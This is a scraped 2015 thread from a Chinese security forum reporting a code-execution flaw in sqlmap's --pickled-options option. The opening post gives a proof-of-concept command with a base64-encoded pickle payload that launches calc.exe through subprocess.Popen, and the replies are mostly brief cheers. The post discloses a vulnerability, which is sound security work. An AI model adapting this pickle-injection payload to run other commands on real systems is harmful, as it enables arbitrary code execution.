红客联盟 - 由08安全团队运营

红客联盟 - 由08安全团队运营»社区首页 › 技术攻防 › 漏洞情报 › sqlmap代码执行漏洞

12 3 4 5 6 7 8 / 8 页下一页

返回列表发帖

查看: 62498|回复: 76

sqlmap代码执行漏洞

发表于 2015-12-9 21:52:29 | 显示全部楼层 |阅读模式

这个漏洞今天在微博上传的比较火。。。。。
下面给出相关POC，

游客，如果您要查看本帖隐藏内容请回复

base64解码

[Python] 纯文本查看 复制代码

sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg=="

视频：

如果无法播放，请点击此处在新窗口打开

sqlmap代码执行

回复

使用道具举报

发表于 2015-12-9 22:06:36 | 显示全部楼层

6666666666666加油

回复支持反对

使用道具举报

发表于 2015-12-9 22:08:35 | 显示全部楼层

看一看瞧一瞧

回复支持反对

使用道具举报

发表于 2015-12-9 22:10:07 | 显示全部楼层

这个好叼啊

回复支持反对

使用道具举报

发表于 2015-12-9 22:12:17 | 显示全部楼层

我去，sqlmap也躺了

回复支持反对

使用道具举报

发表于 2015-12-9 22:13:27 | 显示全部楼层

90大大一定要顶

回复支持反对

使用道具举报

发表于 2015-12-9 22:19:07 | 显示全部楼层

还在的，看一下

回复支持反对

使用道具举报

发表于 2015-12-9 22:24:15 | 显示全部楼层

最新的，来看看

回复支持反对

使用道具举报

发表于 2015-12-9 22:25:47 | 显示全部楼层

沃日，6到家，sqlmapapi的话有用吗？

回复支持反对

使用道具举报

发表于 2015-12-9 22:28:38 | 显示全部楼层

看看是啥

回复支持反对

使用道具举报

12 3 4 5 6 7 8 / 8 页下一页

返回列表发帖

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

应急响应中心

联系我们

官方QQ群：112851260

官方邮箱：security#ihonker.org（#改成@）

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 04:26 , Processed in 0.031109 second(s), 12 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

返回顶部